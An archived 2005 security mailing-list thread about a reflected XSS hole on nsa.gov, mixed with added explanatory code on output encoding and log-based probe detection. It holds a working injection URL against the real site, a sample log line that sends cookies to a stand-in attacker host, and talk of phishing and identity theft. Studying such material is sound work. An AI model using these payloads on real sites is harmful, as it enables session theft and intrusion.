Discussion:
Not even the NSA can get it right
Barrie Dempster
2005-05-24 14:33:10 UTC
http://www.nsa.gov/notices/notic00003.cfm?Address=%22%3E%3Cscript%3Ealert(%22We%20love%20our%20XSS%22)%3C/script%3E
--
With Regards..
Barrie Dempster (zeedo) - Fortiter et Strenue

blog: http://zeedo.blogspot.com
site: http://www.bsrf.org.uk

[ gpg --recv-keys --keyserver www.keyserver.net 0x96025FD0 ]

"He who hingeth aboot, geteth hee-haw" Victor - Still Game

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
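The URL above is a textbook reflected XSS: the `Address` query parameter is echoed into the page, and the `%22%3E` (`">`) prefix shows it lands inside a double-quoted HTML attribute, so the payload closes the attribute and the tag and the rest is parsed as markup. The following is an added example, not code from the post or from the nsa.gov site. It models that bug class in plain JavaScript: the template, the surrounding markup and the `demo()`/`htmlEncode()` helpers are assumptions made for illustration; only the parameter name and the payload come from the posted URL.

```javascript
// Added example; not code from the original post or from the nsa.gov site.
// A ColdFusion page reflects the "Address" query parameter into an HTML
// attribute without encoding it. A value that begins with "> closes the
// attribute and the tag, and whatever follows is parsed as markup. The
// template and page layout below are assumptions for illustration; only the
// parameter name and the payload come from the URL in the post.

// The payload exactly as it appears in the query string of the posted URL.
const POSTED_PAYLOAD_ENCODED =
  '%22%3E%3Cscript%3Ealert(%22We%20love%20our%20XSS%22)%3C/script%3E';

// Vulnerable rendering (assumed template): raw interpolation into a
// double-quoted attribute value, the equivalent of value="#URL.Address#"
// with no encoding function around it.
function renderVulnerable(address) {
  return `<input type="text" name="Address" value="${address}">`;
}

// Encoder for HTML text and attribute contexts: the five characters that
// can change how the surrounding markup is parsed.
function htmlEncode(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened rendering: the same template, with the value encoded for the
// attribute context before it is interpolated.
function renderHardened(address) {
  return `<input type="text" name="Address" value="${htmlEncode(address)}">`;
}

// Review check: does the rendered page contain a <script> start tag at all?
// The template never emits one itself, so any hit means the parameter value
// escaped its attribute.
function containsScriptTag(html) {
  return /<script\b[^>]*>/i.test(html);
}

// Decode the payload the way the server sees the parameter, render it both
// ways and report whether a script tag survived into the markup.
function demo() {
  const payload = decodeURIComponent(POSTED_PAYLOAD_ENCODED);
  const vulnerable = renderVulnerable(payload);
  const hardened = renderHardened(payload);
  return {
    payload,
    vulnerable,
    hardened,
    vulnerableInjects: containsScriptTag(vulnerable),
    hardenedInjects: containsScriptTag(hardened),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

In ColdFusion itself the equivalent fix is to wrap the output in `HTMLEditFormat()` (or `EncodeForHTMLAttribute()` on ColdFusion 10 and later), after which the posted payload renders as literal text inside the field instead of executing. Script that does execute runs in the site's origin and can read whatever cookies are not marked HttpOnly, which is what the CFID/CFTOKEN dump later in the thread illustrates.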
J.A. Terranson
2005-05-24 14:53:57 UTC
Post by Barrie Dempster
http://www.nsa.gov/notices/notic00003.cfm?Address=%22%3E%3Cscript%3Ealert(%22We%20love%20our%20XSS%22)%3C/script%3E
Too funny!
--
Yours,

J.A. Terranson
***@mfn.org
0xBD4A95BF


"Never belong to any party, always oppose privileged classes and public
plunderers, never lack sympathy with the poor, always remain devoted to
the public welfare, never be satisfied with merely printing news, always
be drastically independent, never be afraid to attack wrong, whether by
predatory plutocracy or predatory poverty."

Joseph Pulitzer
1907 Speech
James Tucker
2005-05-24 17:03:42 UTC
Please, define right.

Theirs is a world of deception, therefore any judgement you make based
upon any information may be comprised of as much disinformation as
information. In effect, you can't define such things for them.
Post by Barrie Dempster
http://www.nsa.gov/notices/notic00003.cfm?Address=%22%3E%3Cscript%3Ealert(%22We%20love%20our%20XSS%22)%3C/script%3E
Steve Wray
2005-05-24 19:47:39 UTC
Post by James Tucker
Please, define right.
Theirs is a world of deception, therefore any judgement you make based
upon any information may be comprised of as much disinformation as
information. In effect, you can't define such things for them.
absolutely, and I'm glad someone said it. So many people get so misled
by this sort of bullcrap.

Whenever I read any info volunteered, or even leaked, by an organisation
like that, I have to think 'what do they gain by me believing this?'

They live in paranoia, fear and suspicion. Like the ninja of feudal
Japan they live and die in darkness. This is no way for a human being to
exist. But then I have been watching 'Shintaro the Samurai' :)
Dan Margolis
2005-05-25 04:33:02 UTC
Post by Steve Wray
Post by James Tucker
Please, define right.
Theirs is a world of deception, therefore any judgement you make based
upon any information may be comprised of as much disinformation as
information. In effect, you can't define such things for them.
absolutely, and I'm glad someone said it. So many people get so misled
by this sort of bullcrap.
Whenever I read any info volunteered, or even leaked, by an organisation
like that, I have to think 'what do they gain by me believing this?'
They live in paranoia, fear and suspicion. Like the ninja of feudal
Japan they live and die in darkness. This is no way for a human being to
exist. But then I have been watching 'Shintaro the Samurai' :)
Wait, so are you folks saying that the NSA intentionally allowed an XSS
bug on their Web site so that someone here would report it for some
unknown-to-us devious end?
--
Dan
J.A. Terranson
2005-05-25 11:15:01 UTC
Post by Dan Margolis
Post by Steve Wray
They live in paranoia, fear and suspicion. Like the ninja of feudal
Japan they live and die in darkness. This is no way for a human being to
exist. But then I have been watching 'Shintaro the Samurai' :)
Wait, so are you folks saying that the NSA intentionally allowed an XSS
bug on their Web site so that someone here would report it for some
unknown-to-us devious end?
While I agree with Dan, let me play Devil's Advocate: "live" Honeypot?
James Tucker
2005-05-25 12:03:29 UTC
Post by Dan Margolis
Post by Steve Wray
Post by James Tucker
Please, define right.
Theirs is a world of deception, therefore any judgement you make based
upon any information may be comprised of as much disinformation as
information. In effect, you can't define such things for them.
absolutely, and I'm glad someone said it. So many people get so misled
by this sort of bullcrap.
Whenever I read any info volunteered, or even leaked, by an organisation
like that, I have to think 'what do they gain by me believing this?'
They live in paranoia, fear and suspicion. Like the ninja of feudal
Japan they live and die in darkness. This is no way for a human being to
exist. But then I have been watching 'Shintaro the Samurai' :)
Wait, so are you folks saying that the NSA intentionally allowed an XSS
bug on their Web site so that someone here would report it for some
unknown-to-us devious end?
No I'm saying they might have done. This is just one of many possible
explanations for their actions, and is as viable as ANY other
explanation. You forgot again, that we know nothing, and this means we
can also make no inferences.
milw0rm Inc.
2005-05-25 12:14:12 UTC
lol are you guys joking? They wouldn't allow an xss bug on their
website on purpose come on now.

/str0ke
V***@vt.edu
2005-05-25 15:43:32 UTC
Post by milw0rm Inc.
lol are you guys joking? They wouldn't allow an xss bug on their
website on purpose come on now.
You're not devious enough. Remember that the *best* place to put a
honeypot is right out there in plain sight where it's likely to attract
attention. So now they've grepped their Apache logs, and they've
added several dozen people to their "suspected script kiddie" list.

(Remember - the NSA probably knows more about proper airgapping than anybody.
All *those* webservers have on them is non-sensitive content, so you can't
actually *get* anything really interesting to happen - in the NSA view of the
world, "public website gets defaced" isn't particularly interesting or
noteworthy).
Dan Margolis
2005-05-25 16:58:37 UTC
Post by V***@vt.edu
Post by milw0rm Inc.
lol are you guys joking? They wouldn't allow an xss bug on their
website on purpose come on now.
You're not devious enough. Remember that the *best* place to put a
honeypot is right out there in plain sight where it's likely to attract
attention. So now they've grepped their Apache logs, and they've
added several dozen people to their "suspected script kiddie" list.
(Remember - the NSA probably knows more about proper airgapping than anybody.
All *those* webservers have on them is non-sensitive content, so you can't
actually *get* anything really interesting to happen - in the NSA view of the
world, "public website gets defaced" isn't particularly interesting or
noteworthy).
Right, but why is XSS interesting? Why would they *want* a "suspected
script kiddie" list? Honeypots are good for learning about what sorts of
attacks are in the wild, *not* for learning who the attackers are. In
fact, it seems the common approach to security largely ignores any
notion of proactive law enforcement, and rightly so--you can't arrest
all the script kiddies, but you can write your software to be more
secure (or, to paraphrase Larry Lessig, _code_ is a much more effective
form of control in cyberspace than _law_ is, most of the time).

Granted, we don't know everything the NSA does, but I see little to gain
from a public XSS hole, however insignificant. Occam's razor, folks; why
should I buy into such a twisted conspiracy theory?
--
Dan
V***@vt.edu
2005-05-25 20:10:22 UTC
Post by Dan Margolis
Right, but why is XSS interesting? Why would they *want* a "suspected
script kiddie" list? Honeypots are good for learning about what sorts of
attacks are in the wild, *not* for learning who the attackers are.
So watching the console logs on a tempting target like www.nsa.gov for
a month isn't going to give a *really* good idea of what's out there?

Consider - of those who went and tried the XSS that got posted, what percent
probably tried some *other* tricks to see what *else* they could get it to do?

Yes, the NSA crew almost certainly know the attacks themselves - but by keeping
an eye on what tricks have made it out to the script kiddies, they can measure
how fast the tricks propagate. Any attack they see on *that* server they can
safely conclude that it's part of the script kiddie canon (as it's very unlikely
that a black hat would blow a 0-day attacking that server when everybody *knows*
there's probably nothing worthwhile on there...)

Remember - we're talking about the organization that provided guidance on the
design of DES's S-boxes, which made *no* sense at the time. Many years later,
we find out that the NSA knew about differential cryptanalysis, the IBM crew
independently discovered it, but kept quiet at the NSA's urging, and then when
differential cryptanalysis came out in the open literature, the S-boxes made
sense. This gave the NSA a *very* good measure of how far ahead they were
at the time.

Or the public website is just maintained by low-pay civil servants (after
all, there's no need for a security clearance for any of those pages ;)
Post by Dan Margolis
Granted, we don't know everything the NSA does, but I see little to gain
from a public XSS hole, however insignificant. Occam's razor, folks; why
should I buy into such a twisted conspiracy theory?
I never said you should. I merely implied that immediately concluding that
it was a stupid mistake might in itself be stupid. Remember - we *know* that
many black hats try to stay under the radar by leaving tracks that look like
common script kiddies (so all the recon probes disappear in the noise). Why
shouldn't the world leader in spreading and recognizing disinformation do the
same once in a while? ;)
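The "watch the logs on a tempting target" idea in the post above is, in practice, a small log-review job: parse each request, decode the query string, flag the ones carrying markup or script, and count hits per source address. The following is an added example, not code from the thread. The log lines are constructed for this example in Apache combined format (Paul Kurczaba notes further down that netcraft reported IIS; the format differs but the check is the same); the addresses are documentation ranges and nothing here is a real nsa.gov log. `parseCombinedLogLine()`, `fullyDecode()`, `looksLikeXssProbe()`, `tallyProbes()` and the marker list are assumptions made for illustration; only the request path and parameter name are taken from the posted URL.

```javascript
// Added example; not code from the thread. Detects XSS probes in web server
// access logs: parse the request, URL-decode the query (more than once, since
// probes are often double-encoded), flag markup/script markers, tally by IP.
// The lines below are constructed for this example; nothing here is a real log.

const SAMPLE_LOG = [
  '203.0.113.5 - - [24/May/2005:14:40:01 +0000] "GET /notices/notic00003.cfm?Address=%22%3E%3Cscript%3Ealert(%22We%20love%20our%20XSS%22)%3C/script%3E HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
  '203.0.113.5 - - [24/May/2005:14:41:09 +0000] "GET /notices/notic00003.cfm?Address=%2522%253E%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
  '198.51.100.7 - - [24/May/2005:15:02:33 +0000] "GET /notices/notic00003.cfm?Address=Fort%20Meade%2C%20MD HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
  '198.51.100.9 - - [24/May/2005:15:10:44 +0000] "GET /about/index.cfm HTTP/1.1" 200 8820 "http://www.nsa.gov/" "Mozilla/4.0"',
  '192.0.2.20 - - [24/May/2005:16:00:00 +0000] "GET /notices/notic00003.cfm?Address=%3Cscript%3Edocument.location%3D%27http://evil.example/%3F%27%2Bdocument.cookie%3C/script%3E HTTP/1.1" 200 5120 "-" "curl/7.12"',
];

// Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent".
const COMBINED_RE =
  /^(\S+) (\S+) (\S+) \[([^\]]+)\] "(\S+) (\S+) (\S+)" (\d{3}) (\S+) "([^"]*)" "([^"]*)"$/;

function parseCombinedLogLine(line) {
  const m = COMBINED_RE.exec(line);
  if (!m) return null;
  const target = m[6];
  const q = target.indexOf('?');
  return {
    ip: m[1],
    time: m[4],
    method: m[5],
    path: q < 0 ? target : target.slice(0, q),
    query: q < 0 ? '' : target.slice(q + 1),
    status: Number(m[8]),
    userAgent: m[11],
  };
}

// Percent-decode until the string stops changing (bounded), so that a
// double-encoded %253C is seen as '<' rather than as a harmless '%3C'.
function fullyDecode(s, maxRounds = 3) {
  let cur = s;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try {
      next = decodeURIComponent(cur.replace(/\+/g, ' '));
    } catch (e) {
      return cur; // malformed escape sequence: keep what we have so far
    }
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

// Markers that have no business in a postal-address field. Kept narrow on
// purpose: a bare "on...=" would also match innocent parameters like option=.
const XSS_MARKERS = [
  /<script\b/i,
  /<\/script/i,
  /javascript:/i,
  /\bon(error|load|click|mouseover|focus)\s*=/i,
  /document\.cookie/i,
];

function looksLikeXssProbe(rawQuery) {
  const decoded = fullyDecode(rawQuery);
  return XSS_MARKERS.some((re) => re.test(decoded));
}

// Walk the log, flag probes and count them per source address.
function tallyProbes(lines) {
  const flagged = [];
  const byIp = {};
  for (const line of lines) {
    const rec = parseCombinedLogLine(line);
    if (!rec || !looksLikeXssProbe(rec.query)) continue;
    flagged.push({ ip: rec.ip, time: rec.time, path: rec.path, decodedQuery: fullyDecode(rec.query) });
    byIp[rec.ip] = (byIp[rec.ip] || 0) + 1;
  }
  return { flagged, byIp };
}

console.log(JSON.stringify(tallyProbes(SAMPLE_LOG), null, 2));
```

The decode loop is the part worth copying: a single `decodeURIComponent` pass sees the second sample line as `%22%3E%3Cimg...`, which matches nothing, and the probe slips past the marker list. Running the same tally over a real access log would also surface the point made later in the thread, that most of the hits after a disclosure like this are people retrying the posted payload and a few variants of it.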
Steve Kudlak
2005-05-27 03:59:51 UTC
Way back when I worked for government agencies for a living all the easy
to get to sites had nothing sensitive on them. Everything that had
sensitive stuff was not on the ARPANET or was behind multiple gateways.
Right now even normal citizens like you and me can build pretty secure
systems that will stop a lot of stuff. I assume the NSA does the same
too but can do better. I come from the "Rainbow Books" era and those
have been replaced by other things at this point. But there were a few
bugs in Sun's C-2 Security and that's low level.

Now it could be they hired some standard webdesign firm to do it and
that the website is only its sort of public face. There are Intranets
with much better security and there are secure Networks that run on nice
BSD variants that are very good. BSD is good because a lot of it is
people who every morning or evening;) they get up for the past 20+ years
they have thought about security issues and watched what happened and
all that stuff. I have been giggling at the teenagers who have been
attacking my website as of late. I learned a lot by reading the logs.
But we have secure passwords that are not in any dictionary and all
that good stuff. It is also completely separate from public accounts
like this one I use for day-to-day chattering about on the Internet.

Have Fun,
Sends Steve


Post by V***@vt.edu
Post by Dan Margolis
Right, but why is XSS interesting? Why would they *want* a "suspected
script kiddie" list? Honeypots are good for learning about what sorts of
attacks are in the wild, *not* for learning who the attackers are.
So watching the console logs on a tempting target like www.nsa.gov for
a month isn't going to give a *really* good idea of what's out there?
Consider - of those who went and tried the XSS that got posted, what percent
probably tried some *other* tricks to see what *else* they could get it to do?
Yes, the NSA crew almost certainly know the attacks themselves - but by keeping
an eye on what tricks have made it out to the script kiddies, they can measure
how fast the tricks propagate. Any attack they see on *that* server they can
safely conclude that it's part of the script kiddie canon (as it's very unlikely
that a black hat would blow a 0-day attacking that server when everybody *knows*
there's probably nothing worthwhile on there...)
Remember - we're talking about the organization that provided guidance on the
design of DES's S-boxes, which made *no* sense at the time. Many years later,
we find out that the NSA knew about differential cryptanalysis, the IBM crew
independently discovered it, but kept quiet at the NSA's urging, and then when
differential cryptanalysis came out in the open literature, the S-boxes made
sense. This gave the NSA a *very* good measure of how far ahead they were
at the time.
Or the public website is just maintained by low-pay civil servants (after
all, there's no need for a security clearance for any of those pages ;)
Post by Dan Margolis
Granted, we don't know everything the NSA does, but I see little to gain
from a public XSS hole, however insignificant. Occam's razor, folks; why
should I buy into such a twisted conspiracy theory?
I never said you should. I merely implied that immediately concluding that
it was a stupid mistake might in itself be stupid. Remember - we *know* that
many black hats try to stay under the radar by leaving tracks that look like
common script kiddies (so all the recon probes disappear in the noise). Why
shouldn't the world leader in spreading and recognizing disinformation do the
same once in a while? ;)
Paul Kurczaba
2005-05-26 03:42:45 UTC
To the NSA's advantage, I truly believe that the NSA.gov site is a
natural honeypot. If you think of all the people that try to break in to
it, the NSA looks at their logs and says "Sweet!, we've learned
something new today. Keep on coming..."

just my $0.02
Post by V***@vt.edu
Post by milw0rm Inc.
lol are you guys joking? They wouldn't allow an xss bug on their
website on purpose come on now.
You're not devious enough. Remember that the *best* place to put a
honeypot is right out there in plain sight where it's likely to attract
attention.
So now they've grepped their *Apache* logs

According to netcraft, they are running IIS.

Post by V***@vt.edu
, and they've
added several dozen people to their "suspected script kiddie" list.
(Remember - the NSA probably knows more about proper airgapping than anybody.
All *those* webservers have on them is non-sensitive content, so you can't
actually *get* anything really interesting to happen - in the NSA view of the
world, "public website gets defaced" isn't particularly interesting or
noteworthy).
Dan Margolis
2005-05-26 20:31:38 UTC
Post by Paul Kurczaba
To the NSA's advantage, I truly believe that the NSA.gov site is a
natural honeypot. If you think of all the people that try to break in to
it, the NSA looks at their logs and says "Sweet!, we've learned
something new today. Keep on comming..."
just my $0.02
Valdis and I discussed this a little bit off-list. He disagrees, but I
contend that anything that the NSA could learn from such would be
useless to their two primary goals--securing intelligence, military, and
other government and private sector infrastructure, and conducting
interception/decryption/info war on foreign (or domestic?) "enemy"
targets.

Consider:

www.nsa.gov is NOT a tempting target, thus the likely attackers
are stupid kiddies.

Stupid kiddies are not going to use anything new to the NSA on
www.nsa.gov.

The NSA therefore learns a) what the kiddies know, and b) who the
kiddies are (assuming they don't disguise themselves well)

(a) is relatively useless; its sole value *might* be in indicating what
is "public" and thus not likely to work against a target, but given that
they are going against targets with far more resources than the average
kiddie, this is a poor, if not worthless, indicator of such.

(b) is useless, because the NSA does not conduct law enforcement
operations against cyber criminals, nor, from what we've all heard, do
they cooperate overly well with the agencies that do.

So they've really got nothing to gain from wasting valuable employee
time on such a stupid matter. Even the NSA hires underpaid civil
servants--and I don't think it was a top-secret spook who coded the
ColdFusion behind the front page.

Feel free to let your own imaginations run wild, though. I've heard some
real convincing stories indicating that the Masons were behind the
September 11 attacks, too.
Post by Paul Kurczaba
According to netcraft, they are running IIS.
You can verify this for yourself by looking at the server headers--or
running an OS fingerprinting tool against them. Sure, they could be
spoofing it, but see above.
--
Dan
Barrie Dempster
2005-05-27 13:49:30 UTC
Absolutely spot-on Dan,

My original posting was merely a link to an area of a page where someone
made a mistake, it's not a threat to US National Security in any big
way, the NSA don't give a damn about it. It's just a mistake made by a
developer on their public website, there are worse mistakes on that site
too, for anyone bored enough to go look.

The only people that care enough are defacers looking for a bit of fame.
No one with a life spends time trawling the NSA's website for trivial
errors, if you want to hack the NSA and you think their webserver is a
good place to start, you just might be out of your depth a little.

It wasn't supposed to spark a debate about what the NSA know, don't
know, would like to know, invented, stole or dreamed about. Although
that was probably my error, bringing it up in the first place, I should
have known there would be tinfoil responses.

I was in Nelson from the Simpsons mode and felt like I had to say
"HA-HA!" in public.

Anyone that thinks it's a honeypot is a nutter; if it was a honeypot, as
Dan says, it's a very badly thought-out one.

Just relax and feel safe in the knowledge that governments employ people
that make mistakes (there's a startling revelation!! :-P), point it out
to your next client so that it helps you get a contract or something.
Just don't come on FD and scream conspiracy though, because I've heard
them all and I'm the ringleader of most of them :-P.

BTW, I sell enhanced tinfoil very cheap, we all know that with simple
XSS regular tin foil is rendered useless!

Buy your enhanced tin foil now, it has built-in XSS protection!
{Lots of snipped out but extremely well said and utterly correct opinion}
James Tucker
2005-05-27 16:50:41 UTC
Actually if one wanted to perform covert inter-government attacks, to
do so from any government infrastructure would be stupid as under many
modern laws this constitutes a state of war. To perform these attacks
as a portion of a script kiddie attack would make far more sense, and
would not implicate the government.

Furthermore, communications to and from such authorities may span many
mediums and operate in many directions. Real authentication in this
world occurs through KNOWLEDGE and knowledge alone, as no keys or
other authentication methods are viably secure. I say again, no-one
here really knows anything that they are talking about when it comes
to agencies who specialise in deception, as even your inference may
have been corrupted by previous operations.

This thread is entirely pointless.
Eric Paynter
2005-05-30 19:57:17 UTC
Post by Dan Margolis
I've heard some real convincing stories indicating that the Masons were
behind the September 11 attacks, too.
I thought it was the Bush family. They seem to have made the most profit
from it... :P

-Eric


Mister Coffee
2005-05-25 16:46:38 UTC
<snip>
Post by Dan Margolis
Post by Steve Wray
They live in paranoia, fear and suspicion. Like the ninja of feudal
Japan they live and die in darkness. This is no way for a human being to
exist. But then I have been watching 'Shintaro the Samurai' :)
Wait, so are you folks saying that the NSA intentionally allowed an XSS
bug on their Web site so that someone here would report it for some
unknown-to-us devious end?
No, he's saying the NSA are a bunch of Ninja...

Sorry,
couldn't resist.

Cheers,
L4J

Virus Friendly
2005-05-26 19:35:59 UTC
I agree
Post by James Tucker
Please, define right.
Theirs is a world of deception, therefore any judgement you make based
upon any information may be comprised of as much disinformation as
information. In effect, you can't define such things for them.
imipak
2005-05-25 12:21:50 UTC
Post by James Tucker
You forgot again, that we know nohting, and this means we
can also make no inferences.
Speak for yourself. Seems to me that a lot is known about these
things... purpose & function of NSA is well known (sigint.) Nature of
XSS attack scenarios is well understood, too.
From this some basic conclusions can be drawn.
i-.
--
And what exactly is a dream?
And what exactly is a joke?
- Syd Barrett
Lachniet, Mark
2005-05-25 17:06:01 UTC
Puhleeze, do you really think that tax funded organizations have nothing
better to do? Government faces a continual battle for resources and
time. Setting up a "honeypot" as putzy as this would take time and
effort that could be much better spent. Are you sure it's the NSA that
is paranoid?

Mark Lachniet
-----Original Message-----
Post by milw0rm Inc.
lol are you guys joking? They wouldn't allow an xss bug on their
website on purpose come on now.
You're not devious enough. Remember that the *best* place to
put a honeypot is right out there in plain sight where it's
likely to attract
attention. So now they've grepped their Apache logs, and they've
added several dozen people to their "suspected script kiddie" list.
(Remember - the NSA probably knows more about proper
airgapping than anybody.
All *those* webservers have on them is non-sensitive content,
so you can't actually *get* anything really interesting to
happen - in the NSA view of the world, "public website gets
defaced" isn't particularly interesting or noteworthy).
James Longstreet
2005-05-25 18:26:58 UTC
Don't think a hacker could do much with this. At best someone could try
to use the exploit to phish passwords from NSA.GOV employees.
That's not a problem?
Castigliola, Angelo
2005-05-25 17:24:40 UTC
What would XSS on NSA.GOV get a hacker anyways? Steal my NSA.GOV cookie

"CFID
756140
nsa.gov/
1024
2871474816
31895379
3010520960
29692615
*
CFTOKEN
41950083
nsa.gov/
1024
2871474816
31895379
3010820960
29692615
*"

Don't think a hacker could do much with this. At best someone could try
to use the exploit to phish passwords from NSA.GOV employees.

-Angelo Castigliola III
Security Architect

-----Original Message-----
From: full-disclosure-***@lists.grok.org.uk
[mailto:full-disclosure-***@lists.grok.org.uk] On Behalf Of Dan
Margolis
Sent: Wednesday, May 25, 2005 12:59 PM
To: full-***@lists.grok.org.uk
Subject: Re: [Full-disclosure] Not even the NSA can get it right
Post by V***@vt.edu
Post by milw0rm Inc.
lol are you guys joking? They wouldn't allow an xss bug on their
website on purpose come on now.
You're not devious enough. Remember that the *best* place to put a
honeypot is right out there in plain sight where it's likely to attract
attention. So now they've grepped their Apache logs, and they've
added several dozen people to their "suspected script kiddie" list.
(Remember - the NSA probably knows more about proper airgapping than
anybody. All *those* webservers have on them is non-sensitive content,
so you can't actually *get* anything really interesting to happen - in
the NSA view of the world, "public website gets defaced" isn't
particularly interesting or noteworthy).
Right, but why is XSS interesting? Why would they *want* a "suspected
script kiddie" list? Honeypots are good for learning about what sorts of
attacks are in the wild, *not* for learning who the attackers are. In
fact, it seems the common approach to security largely ignores any
notion of proactive law enforcement, and rightly so--you can't arrest
all the script kiddies, but you can write your software to be more
secure (or, to paraphrase Larry Lessig, _code_ is a much more effective
form of control in cyberspace than _law_ is, most of the time).

Granted, we don't know everything the NSA does, but I see little to gain
from a public XSS hole, however insignificant. Occam's razor, folks; why
should I buy into such a twisted conspiracy theory?
--
Dan
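The probe at the top of the thread starts with `%22%3E` (`">`), which only does anything if the `Address` value is reflected verbatim inside a quoted HTML attribute; the two points debated above are whether that reflection is fixable in code (Dan) and whether the probe shows up in the Apache logs (Valdis). As an added illustration, not code from the thread or from the nsa.gov site, here is that reflection pattern in Python beside its escaped form, plus a log pass over constructed access-log lines (the handler and log lines are assumptions, not the real ones).

```python
import html
import re
from urllib.parse import parse_qs, unquote, urlsplit

# The probe URL posted at the top of the thread (joined across the line wrap).
PROBE_URL = ("http://www.nsa.gov/notices/notic00003.cfm?Address=%22%3E%3Cscript%"
             "3Ealert(%22We%20love%20our%20XSS%22)%3C/script%3E")

def address_param(url: str) -> str:
    """Decoded value of the Address query parameter ('' if absent)."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return qs.get("Address", [""])[0]

def render_unsafe(address: str) -> str:
    """Hypothetical reflection of the parameter into a quoted attribute, verbatim.
    The probe's leading %22%3E ('">') closes the attribute and the tag."""
    return f'<input type="text" name="Address" value="{address}">'

def render_escaped(address: str) -> str:
    """Hardened form: HTML-encode the value (quotes included) before reflecting it."""
    return f'<input type="text" name="Address" value="{html.escape(address, quote=True)}">'

def contains_script_element(markup: str) -> bool:
    """True if a literal <script tag survives in the rendered markup."""
    return "<script" in markup.lower()

# Constructed Apache combined-format lines (not real nsa.gov logs): one probe, one benign.
LOG_LINES = [
    '203.0.113.7 - - [24/May/2005:14:30:01 +0000] "GET /notices/notic00003.cfm?Address='
    '%22%3E%3Cscript%3Ealert(%22We%20love%20our%20XSS%22)%3C/script%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.8 - - [24/May/2005:14:31:12 +0000] "GET /notices/notic00003.cfm?Address='
    '1600%20Pennsylvania%20Ave HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) ')
# Coarse markers; the on\w+= form can also match harmless parameter names, so triage hits.
XSS_MARKERS = re.compile(r"<\s*script|javascript:|on\w+\s*=", re.IGNORECASE)

def flag_xss_probes(lines):
    """Grep-style pass over access-log lines: decode each request's query string and
    return (client_ip, decoded_query) for those carrying script markers."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        query = unquote(urlsplit(target).query)
        if XSS_MARKERS.search(query):
            hits.append((ip, query))
    return hits
```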
V***@vt.edu
2005-05-25 20:09:22 UTC
Don't think a hacker could do much with this. At best someone could try
to use the exploit to phish passwords from NSA.GOV employees.
You're assuming that the "inside" and "outside" appearances of the website
are similar enough that an NSA employee would fall for it.
Aaron Horst
2005-05-26 14:44:51 UTC
Post by Castigliola, Angelo
What would XSS on NSA.GOV get a hacker anyways? Steal my NSA.GOV cookie
"CFID
756140
nsa.gov/
1024
2871474816
31895379
3010520960
29692615
*
CFTOKEN
41950083
nsa.gov/
1024
2871474816
31895379
3010820960
29692615
*"
Don't think a hacker could do much with this. At best someone could try
to use the exploit to phish passwords from NSA.GOV employees.
-Angelo Castigliola III
Security Architect
I don't know about you, but I personally think you could do quite a
bit of identity theft by seeing a few NSA applicants' resumes. Who
else would be more willing to give a "recruiter" sensitive personal
information?

https://www.nsa.gov/applyonline/index.html

AnthraX101
Paul Kurczaba
2005-05-25 18:34:54 UTC
The NSA may have some of the world's best mathematicians, but
certainly not the world's best web-coders :)
Post by Barrie Dempster
http://www.nsa.gov/notices/notic00003.cfm?Address=%22%3E%3Cscript%
3Ealert(%22We%20love%20our%20XSS%22)%3C/script%3E